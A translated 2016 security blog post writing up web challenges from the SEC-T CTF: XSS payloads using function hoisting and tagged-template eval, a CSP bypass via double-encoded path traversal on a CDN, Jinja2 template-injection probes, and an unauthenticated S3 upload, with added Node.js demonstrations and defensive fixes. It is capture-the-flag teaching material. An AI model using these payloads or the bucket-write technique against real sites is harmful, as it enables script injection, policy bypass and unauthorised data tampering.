<h1>CTF sect.ctf.rocks</h1>
<p>Nethemba blog, published 12 September 2016 (author field: Pavol Lupták). Translated from the Slovak original at <a href="https://nethemba.com/cs/ctf-sect-ctf-rocks/">https://nethemba.com/cs/ctf-sect-ctf-rocks/</a>.</p>
<p>A few days ago the <a href="https://www.sec-t.org">SEC-T</a> security conference took place in Sweden, and a <a href="http://sect.ctf.rocks">CTF</a> was part of it.</p>
<p>Because it ran on working days, only a few dozen teams took part (attendance is usually several times higher). As is usual at such CTFs, the tasks were split into categories: binary exploitation, reverse engineering, web, and a misc category that mostly resembled forensic analysis.</p>
<p>I found the web tasks the most interesting. They were written by <a href="https://twitter.com/avlidienbrunn">Mathias Karlsson</a>, a well-known web security researcher, and since they covered modern attacks (some of them inspired by recent findings from bug bounty programs), I will describe their solutions in more detail.</p>
<h3><strong>Admin I &#8211; Web (100)</strong></h3>
<p>In this simplest task the goal was to run potentially malicious JavaScript; as a proof of concept that meant calling <em>alert(1)</em>.</p>
<p>HTML source with the assignment:</p>
<pre><code>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
        &lt;title&gt;XSS1&lt;/title&gt;
        &lt;link rel="stylesheet" href="/custom.css" /&gt;
&lt;/head&gt;
&lt;body&gt;
        &lt;main id="main"&gt;
                &lt;p&gt;Can you alert(1) &lt;a href="?xss=stuff"&gt;this page&lt;/a&gt; (in firefox)?&lt;/p&gt;
                &lt;p&gt;Send your XSS link for flag here:&lt;/p&gt;
                &lt;form method="post" action="contact.php"&gt;
                        &lt;input type="text" name="url" value="" placeholder="http://xss1.sect.ctf.rocks/?xss="&gt;
                        &lt;input type="submit" name="submit" value="Send"&gt;
                &lt;/form&gt;
        &lt;/main&gt;
&lt;/body&gt;
&lt;/html&gt;
&lt;script&gt;
dontrunthisscript();
var a = "stuff";
&lt;/script&gt;</code></pre>
<p>We can inject into the variable <em>a</em> (the value <em>stuff</em>). The obstacle is the function <em>dontrunthisscript()</em>, which is called but never defined anywhere: the JavaScript interpreter throws a ReferenceError on that line and none of the code after it runs. The way around this is described for example at <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Functions">https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Functions</a>:</p>
<p>Unlike functions defined by function expression or by the Function constructor, a function defined by a function declaration can be used before the function declaration itself. For example:</p>
<pre><code>foo(); // alerts FOO!
function foo() {
  alert('FOO!');
}</code></pre>
<p>Function declarations are hoisted to the top of the enclosing script, so a declaration of <em>dontrunthisscript</em> that the injected code places after the call still satisfies it. The resulting exploit:</p>
<p><a href="http://xss1.sect.ctf.rocks/?xss=stuff%22;alert(1);function%20dontrunthisscript(){};//"><code>http://xss1.sect.ctf.rocks/?xss=stuff%22;alert(1);function%20dontrunthisscript(){};//</code></a></p>
<p>Here <code>%22</code> closes the string literal and the trailing <code>//</code> comments out the original closing <code>";</code>.</p>
<h3>Admin II &#8211; Web (200)</h3>
<p>The task is similar to the previous one, but this time parentheses and the equals sign are blocked, which rules out simply running the payload through a non-alphanumeric encoder such as <a href="http://utf-8.jp/public/jjencode.html">jjencode</a> (its output still relies on both). If you remember the <a href="https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml">prompt.ml XSS challenge</a> from 2014, the solution there was ES6 syntax, specifically:</p>
<p><a href="http://xss2.sect.ctf.rocks/?xss=stuff%22;eval.call`${'alert\x281\x29'}`;//">http://xss2.sect.ctf.rocks/?xss=stuff%22;eval.call`${'alert\x281\x29'}`;//</a></p>
<p>A tagged template literal calls a function without parentheses: <code>eval.call`${'alert\x281\x29'}`</code> invokes <code>Function.prototype.call</code> on <code>eval</code> with the template's strings array as <code>this</code> and the interpolated string <code>'alert(1)'</code> as the first argument, which is an indirect eval of <code>alert(1)</code>. The parentheses exist only as <code>\x28</code>/<code>\x29</code> escapes inside a string literal, so the filter never sees them.</p>
<p>For further details I recommend reading the references.</p>
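<p>The two payloads above depend on JavaScript semantics that are easy to misjudge, so here is an added example (not part of the original writeup or the challenge code) that rebuilds the XSS1/XSS2 sink in Node.js and checks which payloads actually reach alert(1). It assumes the parameter is reflected verbatim inside the double-quoted string, that the XSS2 page uses the same sink without the dontrunthisscript() call and rejects only <code>(</code>, <code>)</code> and <code>=</code>, and it replaces the browser's alert with a recording stub.</p>

```javascript
// Added example (not from the writeup or the challenge): rebuilds the
// XSS1/XSS2 sink in Node.js and checks which payloads actually reach alert(1).
//   <script>dontrunthisscript(); var a = "<xss parameter>";</script>
// Assumptions: the parameter is reflected verbatim inside the double-quoted
// string; the XSS2 page is the same sink without the undefined call and
// rejects only '(', ')' and '='; alert() is replaced by a recording stub.

const XSS1_PREFIX = "dontrunthisscript();\n"; // undefined call that aborts the script

// Builds the inline script exactly as the server reflects it.
function buildScript(payload, prefix) {
  return prefix + 'var a = "' + payload + '";';
}

// Runs the reflected script through an indirect eval (global scope, like an
// inline <script>) and records every alert() call. Returns { alerts, error }.
function runSink(payload, prefix) {
  const alerts = [];
  globalThis.alert = (x) => { alerts.push(x); };
  // A function declaration created by a previous eval lives on globalThis;
  // remove it so each run starts from the state of a fresh page load.
  delete globalThis.dontrunthisscript;
  try {
    (0, eval)(buildScript(payload, prefix));
    return { alerts, error: null };
  } catch (e) {
    return { alerts, error: e.constructor.name };
  }
}

// XSS2's filter as the writeup describes it: no parentheses, no equals sign.
function passesXss2Filter(payload) {
  return !/[()=]/.test(payload);
}

// Breaking out of the string is not enough: dontrunthisscript() throws first.
const NAIVE_PAYLOAD = 'stuff";alert(1);//';

// Admin I: function *declarations* are hoisted, so the call at the top of the
// script resolves even though the declaration is injected after it.
const XSS1_PAYLOAD = 'stuff";alert(1);function dontrunthisscript(){};//';

// Admin II: a tagged template invokes a function without parentheses.
// eval.call`${'alert\x281\x29'}` is Function.prototype.call applied to eval
// with the template's strings array as `this` and 'alert(1)' as the first
// argument, i.e. an indirect eval of "alert(1)"; the parentheses exist only
// as \x28/\x29 escapes inside a string literal, which the filter never sees.
const XSS2_PAYLOAD = "stuff\";eval.call`${'alert\\x281\\x29'}`;//";

function demo() {
  return {
    naive: runSink(NAIVE_PAYLOAD, XSS1_PREFIX),
    xss1: runSink(XSS1_PAYLOAD, XSS1_PREFIX),
    xss2: runSink(XSS2_PAYLOAD, ""),
    xss1PassesFilter: passesXss2Filter(XSS1_PAYLOAD),
    xss2PassesFilter: passesXss2Filter(XSS2_PAYLOAD),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

<p>Running it shows the naive payload dying with a ReferenceError before alert is reached, the hoisting payload and the tagged-template payload both recording <code>alert(1)</code>, and only the second of those surviving the XSS2 character filter. The indirect eval matters: a direct <code>eval(...)</code> would run the reflected code inside <code>runSink</code>'s scope rather than the global one an inline script sees.</p>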
<h3>Admin III &#8211; Web (400)</h3>
<p>The HTML source and the assignment are again almost identical, but notice the difference in the response headers:</p>
<pre><code>$ curl -i "xss3.sect.ctf.rocks/?xss=stuff"
HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Date: Sat, 10 Sep 2016 10:17:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Security-Policy: default-src 'none'; style-src 'self'; img-src 'self'; script-src https://cdnjs.cloudflare.com/ajax/libs/jquery/
Set-Cookie: PHPSESSID=gva2nj4bg7vgmabh5hli2nkk41; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
        &lt;title&gt;XSS3&lt;/title&gt;
        &lt;link rel="stylesheet" href="/custom.css" /&gt;
&lt;/head&gt;
&lt;body&gt;
        &lt;main id="main"&gt;
                &lt;p&gt;Can you alert(1) &lt;a href="?xss=stuff"&gt;this page&lt;/a&gt; (in firefox)?&lt;/p&gt;
                &lt;p&gt;Send your XSS link for flag here:&lt;/p&gt;
                &lt;form method="post" action="contact.php"&gt;
                        &lt;input type="text" name="url" value="" placeholder="http://xss3.sect.ctf.rocks/?xss="&gt;
                        &lt;input type="submit" name="submit" value="Send"&gt;
                &lt;/form&gt;
        &lt;/main&gt;
&lt;/body&gt;
&lt;/html&gt;
stuff</code></pre>
<p>The parameter is reflected as raw markup after the closing <code>&lt;/html&gt;</code> tag, so injecting HTML is easy; the goal is to get past the CSP, which is set as follows:</p>
<p><code>default-src 'none'; style-src 'self'; img-src 'self'; script-src https://cdnjs.cloudflare.com/ajax/libs/jquery/</code></p>
<p>Script can only be loaded from that one CDN path, which also hosts outdated versions. My first idea was to use an old, vulnerable jQuery release, but because the challenge also restricted custom elements and selectors, that technique could not be used.</p>
<p>Interesting ways to bypass CSP are again described on the <a href="https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22">XSSChallengeWiki</a>. One of them:</p>
<pre><code>"ng-app ng-csp&gt;
&lt;base href=//ajax.googleapis.com/ajax/libs/&gt;&lt;script src=angularjs/1.0.1/angular.js&gt;&lt;/script&gt;
&lt;script src=prototype/1.7.2.0/prototype.js&gt;&lt;/script&gt;{{$on.curry.call().alert(1337</code></pre>
<p>The technique is documented for example <a href="https://conference.hitb.org/hitbsecconf2016ams/materials/D1T2%20-%20Michele%20Spagnuolo%20and%20Lukas%20Weichselbaum%20-%20CSP%20Oddities.pdf">here</a> (CSP Oddities, HITB 2016), page 17: with <code>ng-csp</code> AngularJS 1.0.1 still evaluates the <code>{{ }}</code> expression, Prototype's <code>Function.prototype.curry</code> returns <code>this</code> when called without arguments, and <code>.call()</code> without a receiver makes that <code>this</code> the global object, so the expression reaches <code>window.alert</code>.</p>
<p>Here, however, there is a catch: the CSP only allows the path <em>/ajax/libs/jquery/</em>, while we need <em>/ajax/libs/angular.js/</em> (cdnjs hosts AngularJS under that name). Once we realise that the CSP path check can be defeated with double encoding, the task is solved. The <em>xss</em> parameter carries the following markup (the <code>%252f</code> is what the parameter must contain so that one round of decoding leaves <code>%2f</code>):</p>
<pre><code>&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/..%252fangular.js/1.0.1/angular.js"&gt;&lt;/script&gt;
&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/..%252fprototype/1.7.2/prototype.js"&gt;&lt;/script&gt;
&lt;div ng-app ng-csp&gt;
{{$on.curry.call().alert(1)}}
&lt;/div&gt;</code></pre>
<p>The application URL-decodes the <em>xss</em> parameter once, so <code>..%252f</code> ends up in the page as <code>..%2f</code>. For the CDN's web server <em>/test%2f1337</em> is the same as <em>/test/1337</em>: it decodes the slash, resolves the <code>..</code> and serves <em>/ajax/libs/angular.js/1.0.1/angular.js</em>. The CSP matcher in Firefox at the time, however, compared the path literally, treating <code>..%2fangular.js</code> as just another segment under <em>/ajax/libs/jquery/</em>, so the load was allowed. At the time of writing this was an open hole in the current Firefox release.</p>
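<p>To make the Admin III path-matching gap concrete, here is an added example (not from the writeup) in Node.js. It models three things: the application's single URL-decoding of the <em>xss</em> parameter, a CSP matcher that compares the script path literally (a model of the behaviour the bypass relied on, not code taken from any browser), and the path the CDN's web server actually resolves after decoding <code>%2f</code> and collapsing <code>..</code>. The <code>cspPathAllowsStrict</code> function shows the property a matcher needs in order to close the gap; the jQuery file name used for the legitimate case is only an illustrative in-policy path.</p>

```javascript
// Added example (not from the writeup): the path-matching gap behind the
// Admin III bypass, modelled with Node's built-in WHATWG URL parser.
//
//   reflectedSrc        - the application URL-decodes ?xss= once
//   cspPathAllowsRaw    - literal path-prefix matcher (assumed model of the
//                         browser behaviour the bypass relied on)
//   serverResolvedPath  - what the CDN's web server resolves and serves
//   cspPathAllowsStrict - matcher that decides on the server-resolved path

const POLICY_SRC = "https://cdnjs.cloudflare.com/ajax/libs/jquery/";

// One round of URL decoding, as PHP applies to $_GET values:
// "..%252fangular.js" -> "..%2fangular.js"
function reflectedSrc(rawParamValue) {
  return decodeURIComponent(rawParamValue);
}

// RFC 3986 remove_dot_segments on an already percent-decoded path.
function removeDotSegments(path) {
  const out = [];
  for (const seg of path.split("/")) {
    if (seg === "..") {
      if (out.length > 1) out.pop(); // never pop the leading "" (the root)
    } else if (seg !== ".") {
      out.push(seg);
    }
  }
  return out.join("/");
}

// Path the origin server will actually serve for `url`: decode, then
// collapse "." and ".." segments.
function serverResolvedPath(url) {
  return removeDotSegments(decodeURIComponent(new URL(url).pathname));
}

function sameOrigin(sourceExpr, url) {
  return new URL(sourceExpr).origin === new URL(url).origin;
}

// Literal prefix match: a source path ending in "/" covers everything below
// it, compared byte for byte, without decoding or dot-segment removal.
function cspPathAllowsRaw(sourceExpr, url) {
  if (!sameOrigin(sourceExpr, url)) return false;
  const srcPath = new URL(sourceExpr).pathname;
  const urlPath = new URL(url).pathname;
  return srcPath.endsWith("/") ? urlPath.startsWith(srcPath) : urlPath === srcPath;
}

// Hardened variant: apply the same prefix rule to the path the server will
// resolve, so "..%2f" tricks cannot escape the allowed directory.
function cspPathAllowsStrict(sourceExpr, url) {
  if (!sameOrigin(sourceExpr, url)) return false;
  const srcPath = new URL(sourceExpr).pathname;
  const resolved = serverResolvedPath(url);
  return srcPath.endsWith("/") ? resolved.startsWith(srcPath) : resolved === srcPath;
}

function demo() {
  const fragment = reflectedSrc("..%252fangular.js/1.0.1/angular.js");
  const bypass = POLICY_SRC + fragment;
  const legit = POLICY_SRC + "3.1.0/jquery.min.js"; // illustrative in-policy file
  return {
    reflected: fragment,
    bypassUrl: bypass,
    rawAllowsBypass: cspPathAllowsRaw(POLICY_SRC, bypass),
    serverServes: serverResolvedPath(bypass),
    strictAllowsBypass: cspPathAllowsStrict(POLICY_SRC, bypass),
    rawAllowsLegit: cspPathAllowsRaw(POLICY_SRC, legit),
    strictAllowsLegit: cspPathAllowsStrict(POLICY_SRC, legit),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

<p>The literal matcher accepts the bypass URL because its path still begins with <code>/ajax/libs/jquery/</code>, while the server resolves the very same request to <code>/ajax/libs/angular.js/1.0.1/angular.js</code>, outside the allowed directory; the strict matcher rejects it and still accepts the genuine jQuery path. Whether a given browser version implements the strict behaviour is not something this example checks.</p>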
<h3>Techno_Tech &#8211; Web (300)</h3>
<p>The vulnerability, which took me only a few seconds to find, was template injection. It is identical to the recent <a href="https://hackerone.com/reports/125980">Uber</a> site hack, where the developer decided to write a custom template for the 404 handler, which looks like this:</p>
<pre><code>        template = '''

        {%% block body %%}
            &lt;div class="center-content error"&gt;
                &lt;h1&gt;Oops! That page doesn't exist.&lt;/h1&gt;
                &lt;h3&gt;%s&lt;/h3&gt;
            &lt;/div&gt;
        {%% endblock %%}</code></pre>
<p>The <code>%s</code> (and the doubled <code>%%</code> around the block tags) show that the requested path is formatted into the template source with Python's <code>%</code> operator before the template is rendered, so anything in the path becomes Jinja2 syntax. Requesting the URL <em>/test{{9*9}}</em> therefore makes the web server reply that the file <em>test81</em> does not exist.</p>
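<p>An added example (not part of the writeup) that generalises the <em>/test{{9*9}}</em> probe: it sends a distinctive arithmetic expression in the path for a few template syntaxes and classifies whether the 404 page evaluated it, reflected it, or dropped it. The server responses are constructed stand-ins for a vulnerable <code>%s</code>-formatted handler and for a fixed one that renders the path as a context variable with autoescaping; paths are shown in decoded form, whereas a real client would percent-encode the braces.</p>

```javascript
// Added example (not from the writeup): probe-based detection of server-side
// template injection, generalising the "/test{{9*9}} -> test81" check.
// The sample responses below are constructed, not captured from the challenge.

const PREFIX = "probe"; // whatever the 404 page echoes back in front of the path

// A distinctive product that will not occur in a normal page by accident.
const PROBES = [
  { expr: "{{1111*1111}}", marker: "1234321", engines: "Jinja2 / Twig" },
  { expr: "${1111*1111}", marker: "1234321", engines: "FreeMarker / Java EL" },
  { expr: "<%= 1111*1111 %>", marker: "1234321", engines: "ERB" },
];

function probePath(expr) {
  return "/" + PREFIX + expr; // a real client percent-encodes the braces
}

// "evaluated": the engine computed the expression -> template injection
// "reflected": the expression came back untouched -> reflection only
// "absent":    neither (filtered, escaped, different error page, ...)
function classify(probe, body) {
  if (body.includes(PREFIX + probe.marker)) return "evaluated";
  if (body.includes(PREFIX + probe.expr)) return "reflected";
  return "absent";
}

// `send(path)` returns the response body for a request to `path`.
// Returns the first engine family whose expression was evaluated, or null.
function detect(send) {
  for (const p of PROBES) {
    if (classify(p, send(probePath(p.expr))) === "evaluated") {
      return { engines: p.engines, probe: p.expr };
    }
  }
  return null;
}

// Constructed 404 bodies for a handler that does `template % path` and then
// renders the result with Jinja2: the Jinja2 probe is evaluated, the others
// are not Jinja2 syntax and come back verbatim.
const SAMPLE_VULNERABLE = {
  "/probe{{1111*1111}}": "<h1>Oops! That page doesn't exist.</h1><h3>probe1234321</h3>",
  "/probe${1111*1111}": "<h1>Oops! That page doesn't exist.</h1><h3>probe${1111*1111}</h3>",
  "/probe<%= 1111*1111 %>": "<h1>Oops! That page doesn't exist.</h1><h3>probe<%= 1111*1111 %></h3>",
};

// Constructed bodies for the fixed handler, which renders `{{ path }}` from
// the template context with autoescaping on: nothing is evaluated and the
// ERB-style probe's angle brackets are escaped on output.
const SAMPLE_FIXED = {
  "/probe{{1111*1111}}": "<h1>Oops! That page doesn't exist.</h1><h3>probe{{1111*1111}}</h3>",
  "/probe${1111*1111}": "<h1>Oops! That page doesn't exist.</h1><h3>probe${1111*1111}</h3>",
  "/probe<%= 1111*1111 %>": "<h1>Oops! That page doesn't exist.</h1><h3>probe&lt;%= 1111*1111 %&gt;</h3>",
};

const fromTable = (table) => (path) => table[path] || "";

console.log("vulnerable:", detect(fromTable(SAMPLE_VULNERABLE)));
console.log("fixed:", detect(fromTable(SAMPLE_FIXED)));
```

<p>Against the vulnerable handler the Jinja2 probe comes back as <code>probe1234321</code> and is reported; against the fixed handler every probe is either reflected verbatim or escaped, and nothing is reported. The same <code>send</code> hook can wrap a real HTTP client, with the usual caveat that a product like 1234321 appearing for another reason still needs a second, different probe to confirm.</p>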
<p>This finding can be escalated much further: in most cases the attacker can then read or write arbitrary files on disk or, by changing a configuration file, run arbitrary commands with the privileges of the web user. My solution is described <a href="https://github.com/73696e65/ctf-notes/blob/master/2016-sect.ctf.rocks/Web-300-Techno_Tech.md">here</a>, inspired by the blog posts listed in the references, where you will find more details. The fix is to keep user input out of the template source altogether and pass the path in as a context variable rendered with <code>{{ path }}</code>.</p>
<h3>iFile &#8211; Web (250)</h3>
<p>The web page contained the link <a href="http://filer.sect.ctf.rocks/?bulkfile=http://files.filer.sect.ctf.rocks/example.txt">http://filer.sect.ctf.rocks/?bulkfile=http://files.filer.sect.ctf.rocks/example.txt</a>; the file <em>example.txt</em> held the names of two files, the content of the first was inserted into the page header and the second formed the page body.</p>
<p>The page itself showed no known security flaws. <em>files.filer.sect.ctf.rocks</em> is an <a href="https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingBucket.html">Amazon S3 bucket</a>, and if its permissions are not configured properly, an anonymous attacker can list the objects in the bucket, download them, or upload new ones.</p>
<p>In practice this vulnerability was demonstrated for example <a href="https://hackerone.com/reports/128088">here</a> and <a href="https://hackerone.com/reports/152584">here</a>, against the HackerOne and Harvest sites.</p>
<p>Solution: upload a bulk file to the bucket that points both entries at <em>flag.php</em>, then let the application fetch it. The PUT is sent without any authentication:</p>
<pre><code>$ telnet files.filer.sect.ctf.rocks 80
Trying 54.231.17.73...
Connected to s3-1-w.amazonaws.com.
Escape character is '^]'.
PUT /abc.txt HTTP/1.1
Host: files.filer.sect.ctf.rocks
Date: Sat, 10 Sep 2016 09:21:02 GMT
Content-Type: text/plain
Content-Length: 32

/files/flag.php
/files/flag.php
HTTP/1.1 200 OK
x-amz-id-2: 3GLe0t1bgnmvrVbZic0CAjd8x5mwPBJRR6stEJj+e6/7x+8tZe0jteImuhxukQKZJFa6z0yOnrY=
x-amz-request-id: 3F732267A35970EC
Date: Sat, 10 Sep 2016 09:21:26 GMT
ETag: "c1f1b2f47ed3ad9c7785dc233fcb1ce5"
Content-Length: 0
Server: AmazonS3</code></pre>
<p>The anonymous PUT succeeded (HTTP 200 with an ETag), which a correctly locked-down bucket would refuse with <code>403 Forbidden</code> and an <code>AccessDenied</code> error document. After visiting <a href="http://filer.sect.ctf.rocks/?bulkfile=http://files.filer.sect.ctf.rocks/abc.txt">http://filer.sect.ctf.rocks/?bulkfile=http://files.filer.sect.ctf.rocks/abc.txt</a> the solution was displayed.</p>
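<p>As an added example (not from the writeup), the following Node.js code builds the same kind of anonymous S3 requests the telnet session above types by hand, parses S3's responses, and turns the results of three probes (list, read, write) into findings. The host and object key are placeholders, and the response texts are constructed to resemble S3's open-bucket and AccessDenied answers rather than captured from a live bucket; nothing here touches the network.</p>

```javascript
// Added example (not from the writeup): anonymous S3 bucket checks in the
// spirit of the telnet session above. Host, key and all response texts are
// placeholders/constructed; nothing here talks to the network.

const BUCKET_HOST = "example-bucket.s3.amazonaws.com"; // placeholder

// Raw HTTP/1.1 request text with a byte-accurate Content-Length, suitable for
// piping into `nc <host> 80`. No Authorization header: the point is to see
// whether the bucket accepts the request from an anonymous caller.
function buildRequest(method, host, path, body = "", contentType = "text/plain") {
  const lines = [`${method} ${path} HTTP/1.1`, `Host: ${host}`, "Connection: close"];
  if (body.length > 0) {
    lines.push(`Content-Type: ${contentType}`);
    lines.push(`Content-Length: ${Buffer.byteLength(body, "utf8")}`);
  }
  return lines.join("\r\n") + "\r\n\r\n" + body;
}

// Minimal parse of an S3 response: status code, the <Code> of an error
// document (e.g. AccessDenied) and the <Key>s of a bucket listing.
function parseResponse(raw) {
  const statusLine = raw.match(/^HTTP\/1\.[01] (\d{3})/);
  const status = statusLine ? Number(statusLine[1]) : 0;
  const split = raw.indexOf("\r\n\r\n");
  const body = split === -1 ? "" : raw.slice(split + 4);
  const code = (body.match(/<Code>([^<]+)<\/Code>/) || [])[1] || null;
  const keys = Array.from(body.matchAll(/<Key>([^<]+)<\/Key>/g), (m) => m[1]);
  return { status, code, keys };
}

// Findings from three anonymous probes: GET / (list), GET an object, PUT an object.
function assessBucket({ list, get, put }) {
  const findings = [];
  if (list.status === 200) findings.push(`anonymous listing: ${list.keys.length} key(s) visible`);
  if (get.status === 200) findings.push("anonymous read of existing objects");
  if (put.status === 200) findings.push("anonymous write: arbitrary objects can be uploaded");
  return findings;
}

// Constructed responses (not captured): an open bucket and a locked-down one.
const LIST_OPEN =
  "HTTP/1.1 200 OK\r\nContent-Type: application/xml\r\nServer: AmazonS3\r\n\r\n" +
  '<?xml version="1.0" encoding="UTF-8"?><ListBucketResult><Name>example-bucket</Name>' +
  "<Contents><Key>example.txt</Key></Contents><Contents><Key>files/flag.php</Key></Contents></ListBucketResult>";
const GET_OPEN = "HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\nServer: AmazonS3\r\n\r\nfirst.txt\nsecond.txt\n";
const PUT_OPEN = 'HTTP/1.1 200 OK\r\nETag: "placeholder"\r\nContent-Length: 0\r\nServer: AmazonS3\r\n\r\n';
const DENIED =
  "HTTP/1.1 403 Forbidden\r\nContent-Type: application/xml\r\nServer: AmazonS3\r\n\r\n" +
  '<?xml version="1.0" encoding="UTF-8"?><Error><Code>AccessDenied</Code><Message>Access Denied</Message></Error>';

function demo() {
  const open = assessBucket({
    list: parseResponse(LIST_OPEN),
    get: parseResponse(GET_OPEN),
    put: parseResponse(PUT_OPEN),
  });
  const locked = assessBucket({
    list: parseResponse(DENIED),
    get: parseResponse(DENIED),
    put: parseResponse(DENIED),
  });
  return { open, locked };
}

console.log(buildRequest("PUT", BUCKET_HOST, "/abc.txt", "/files/flag.php\n/files/flag.php\n"));
console.log(JSON.stringify(demo(), null, 2));
```

<p>The generated PUT carries <code>Content-Length: 32</code> for the two-line body used in the writeup, and the assessment reports three findings for the open bucket and none for the locked one, whose every probe parses to status 403 with <code>AccessDenied</code>. On the defensive side the condition to check for is any bucket policy or ACL that grants <code>s3:PutObject</code> or <code>s3:ListBucket</code> to an anonymous principal, which S3's Block Public Access settings are designed to prevent.</p>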
<h3>Conclusion</h3>
<p>Since the timing of the competition was not ideal for me and I only gave it a few hours of spare time, I finished only in the top ten. The tasks were not as hard as in other prestigious CTFs (PPP, CSAW, ASIS), but they were still a challenge and in my opinion reflected well the level of complexity typical of hacking on bug bounty programs.</p>
<p>If you want to try the tasks yourself, a mirror is available at the time of writing at <a href="http://mirror.sect.ctf.rocks">http://mirror.sect.ctf.rocks</a>.</p>
<h4><strong>References</strong></h4>
<div><a href="https://cure53.de/es6-for-penetration-testers.pdf">https://cure53.de/es6-for-penetration-testers.pdf</a></div>
<div><a href="https://github.com/73696e65/ctf-notes/tree/master/2016-sect.ctf.rocks">https://github.com/73696e65/ctf-notes/tree/master/2016-sect.ctf.rocks</a></div>
<div><a href="https://github.com/cure53/XSSChallengeWiki/wiki">https://github.com/cure53/XSSChallengeWiki/wiki</a></div>
<div><a href="https://conference.hitb.org/hitbsecconf2016ams/materials/D1T2%20-%20Michele%20Spagnuolo%20and%20Lukas%20Weichselbaum%20-%20CSP%20Oddities.pdf">https://conference.hitb.org/hitbsecconf2016ams/materials/D1T2%20-%20Michele%20Spagnuolo%20and%20Lukas%20Weichselbaum%20-%20CSP%20Oddities.pdf</a></div>
<div><a href="https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2/">https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2/</a></div>
<div><a href="https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/">https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/</a></div>
<div><a href="https://blog.0daylabs.com/2016/09/09/bypassing-csp/">https://blog.0daylabs.com/2016/09/09/bypassing-csp/</a></div>
Lupt\u00e1k"},"sameAs":["https:\/\/www.nethemba.com\/"],"url":"https:\/\/nethemba.com\/cs\/author\/nethemba-admin\/"}]}},"_links":{"self":[{"href":"https:\/\/nethemba.com\/cs\/wp-json\/wp\/v2\/posts\/2001","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nethemba.com\/cs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nethemba.com\/cs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nethemba.com\/cs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nethemba.com\/cs\/wp-json\/wp\/v2\/comments?post=2001"}],"version-history":[{"count":0,"href":"https:\/\/nethemba.com\/cs\/wp-json\/wp\/v2\/posts\/2001\/revisions"}],"wp:attachment":[{"href":"https:\/\/nethemba.com\/cs\/wp-json\/wp\/v2\/media?parent=2001"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nethemba.com\/cs\/wp-json\/wp\/v2\/categories?post=2001"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nethemba.com\/cs\/wp-json\/wp\/v2\/tags?post=2001"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}